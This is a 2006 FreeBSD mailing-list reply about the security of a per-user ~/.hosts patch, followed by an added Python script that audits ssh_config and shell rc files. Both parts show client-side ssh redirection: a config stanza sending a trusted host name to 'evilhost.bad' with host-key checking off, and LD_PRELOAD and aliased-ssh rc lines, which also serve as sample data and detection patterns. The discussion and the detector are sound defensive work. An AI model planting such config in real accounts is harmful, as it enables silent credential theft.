From owner-freebsd-current@FreeBSD.ORG Wed Jun 21 14:57:18 2006
X-Original-To: freebsd-current@freebsd.org
Delivered-To: freebsd-current@freebsd.org
Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 993FE16A47D for ; Wed, 21 Jun 2006 14:57:18 +0000 (UTC) (envelope-from craig@xfoil.gank.org)
Received: from ion.gank.org (ion.gank.org [69.55.238.164]) by mx1.FreeBSD.org (Postfix) with ESMTP id 30E7D43D46 for ; Wed, 21 Jun 2006 14:57:15 +0000 (GMT) (envelope-from craig@xfoil.gank.org)
Received: by ion.gank.org (Postfix, from userid 1001) id 4A7CA115F1; Wed, 21 Jun 2006 09:57:14 -0500 (CDT)
Date: Wed, 21 Jun 2006 09:57:10 -0500
From: Craig Boston
To: Peter Ross
Cc: Mike Jakubik, "freebsd-current@freebsd.org", Justin Hibbits
Subject: Re: ~/.hosts patch
Message-ID: <20060621145710.GA12942@nowhere>
Mail-Followup-To: Craig Boston, Peter Ross, Brooks Davis, Mike Jakubik, "freebsd-current@freebsd.org", Justin Hibbits
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.4.2.1i
X-BeenThere: freebsd-current@freebsd.org
X-Mailman-Version: 2.1.5
Precedence: list
List-Id: Discussions about the use of FreeBSD-current
X-List-Received-Date: Wed, 21 Jun 2006 14:57:18 -0000

On Wed, Jun 21, 2006 at 04:59:09PM +1000, Peter Ross wrote:
> If you are able to hack your way into a machine you can write this file
> so later attempts to connect to a remote machine can be redirected (e.g.
> useful to get login passwords) - you do not need root access to achieve
> it.

If you are able to hack your way into a machine you can write something
like this into ~/.ssh/config:

    Host goodhost
        HostKeyAlias Own3d
        StrictHostKeyChecking no
        HostName evilhost.bad

For that matter, you could add aliases to .shrc or .cshrc to run some
wrapper program instead. Say, one that sets LD_PRELOAD=~/.libevil.so,
which contains custom gethost* functions. Or have it run a custom ssh
binary that doesn't do any host key checking at all, or logs all
passwords somewhere.

Once an account is compromised, all bets are off. You can't assume that
DNS lookups are valid, as your C library may be overridden by something
local to the account. The login shell could be trojaned to hide the
files. Other users would of course be unaffected (so long as you didn't
give up the root password).

I don't think the ~/.hosts idea adds any additional risk. If anything, a
~/.hosts compromise would be easier to detect than more complex methods.

Craig
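The redirection trick above lives entirely in per-user files, so it can be hunted in per-user files. What follows is an added audit script, not part of the original thread and not part of any FreeBSD patch: it parses an ssh_config-style file into Host blocks and flags the combination Craig describes (a rewritten HostName next to HostKeyAlias or StrictHostKeyChecking no), plus the other directives that let a client silently accept a redirected host, and it scans a shell rc file for the LD_PRELOAD and alias variants he mentions. The sample config and rc contents are constructed for the example; the directive names are real ssh_config keywords, but the severities and the finding format are the script's own choices.

```python
"""Audit a user's ~/.ssh/config and shell rc for client-side ssh redirection."""
import re
import sys

# Directives that weaken or redirect host-key checking (real ssh_config keywords;
# severities are this script's own assumptions, not OpenSSH's).
UNSAFE_KEYS = {
    "stricthostkeychecking": ("high", "an unknown or mismatching host key will not stop the connection"),
    "hostkeyalias": ("warn", "known_hosts is consulted under a different name than the one typed"),
    "userknownhostsfile": ("warn", "the known_hosts lookup is redirected to another file"),
    "proxycommand": ("warn", "the connection is tunnelled through an arbitrary local command"),
    "localcommand": ("warn", "an arbitrary local command runs after login"),
}

# "Key value" or "Key=value"; keys are case-insensitive in ssh_config.
_DIRECTIVE = re.compile(r"^\s*([A-Za-z]+)\s*(?:=\s*|\s+)(.*?)\s*$")

# Constructed sample: the stanza from the message plus one ordinary alias block.
SAMPLE_SSH_CONFIG = """\
# benign short alias
Host build
    HostName build.example.org
    User ci

Host goodhost
    HostKeyAlias Own3d
    StrictHostKeyChecking no
    HostName evilhost.bad
"""

# Constructed sample ~/.shrc matching the wrapper/LD_PRELOAD variants in the message.
SAMPLE_SHRC = """\
PATH=$HOME/bin:$PATH
alias ssh='$HOME/.cache/.s/ssh'
export LD_PRELOAD=$HOME/.libevil.so
"""

def parse_ssh_config(text):
    """Return [(patterns, {key: value})] blocks in file order.

    Directives before the first Host/Match line go into a leading block with
    pattern ['*'], which is how ssh(1) applies them. Within a block the first
    occurrence of a key wins, as it does in ssh(1).
    """
    blocks = [(["*"], {})]
    for raw in text.splitlines():
        if not raw.strip() or raw.lstrip().startswith("#"):
            continue
        m = _DIRECTIVE.match(raw)
        if not m:
            continue
        key, value = m.group(1).lower(), m.group(2)
        if key in ("host", "match"):
            blocks.append((value.split(), {}))
        else:
            blocks[-1][1].setdefault(key, value)
    return blocks

def audit_ssh_config(text):
    """Return findings as (severity, host, directive, note) tuples."""
    findings = []
    for patterns, directives in parse_ssh_config(text):
        host = " ".join(patterns)
        hits = []
        for key, (sev, note) in UNSAFE_KEYS.items():
            if key not in directives:
                continue
            if key == "stricthostkeychecking" and directives[key].lower() not in ("no", "off"):
                continue  # yes/ask keep the check, so nothing to report
            hits.append((sev, host, key, "%s=%s: %s" % (key, directives[key], note)))
        hostname = directives.get("hostname")
        if hostname and hostname.lower() not in (p.lower() for p in patterns):
            # A rewritten HostName is normal on its own (short aliases). Next to a
            # weakened host-key check it is exactly the redirection in the message.
            sev = "high" if hits else "info"
            hits.append((sev, host, "hostname", "'%s' actually connects to %s" % (host, hostname)))
        findings.extend(hits)
    return findings

# Shell rc patterns for the wrapper variants: LD_PRELOAD, an aliased ssh family,
# and a $HOME directory prepended to PATH (the last is common, so only "info").
_RC_PATTERNS = [
    ("high", re.compile(r"\bLD_PRELOAD\b"), "LD_PRELOAD set from the rc file: resolver and I/O functions can be replaced per process"),
    ("high", re.compile(r"^\s*alias\s+(?:ssh|scp|sftp)\b"), "ssh family aliased to something else"),
    ("info", re.compile(r"^\s*(?:export\s+)?PATH=(?:\$HOME|~)"), "a $HOME directory is prepended to PATH, so a trojaned ssh there wins"),
]

def audit_shell_rc(text):
    """Return findings as (severity, line_number, line, note) tuples."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for sev, pattern, note in _RC_PATTERNS:
            if pattern.search(line):
                findings.append((sev, lineno, line.strip(), note))
    return findings

if __name__ == "__main__":
    # Usage: audit_ssh.py [ssh_config_path [shell_rc_path]]; defaults to the samples.
    cfg = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_SSH_CONFIG
    rc = open(sys.argv[2]).read() if len(sys.argv) > 2 else SAMPLE_SHRC
    for f in audit_ssh_config(cfg):
        print("ssh_config %-4s host=%s %s" % (f[0], f[1], f[3]))
    for f in audit_shell_rc(rc):
        print("shell_rc   %-4s line %d: %s (%s)" % (f[0], f[1], f[2], f[3]))
```

The benign "build" alias produces only an info-level note, while the "goodhost" stanza from the message is escalated to high because HostName is rewritten next to a disabled host-key check; that contrast is what makes the check usable without drowning in the ordinary aliases people keep in ~/.ssh/config.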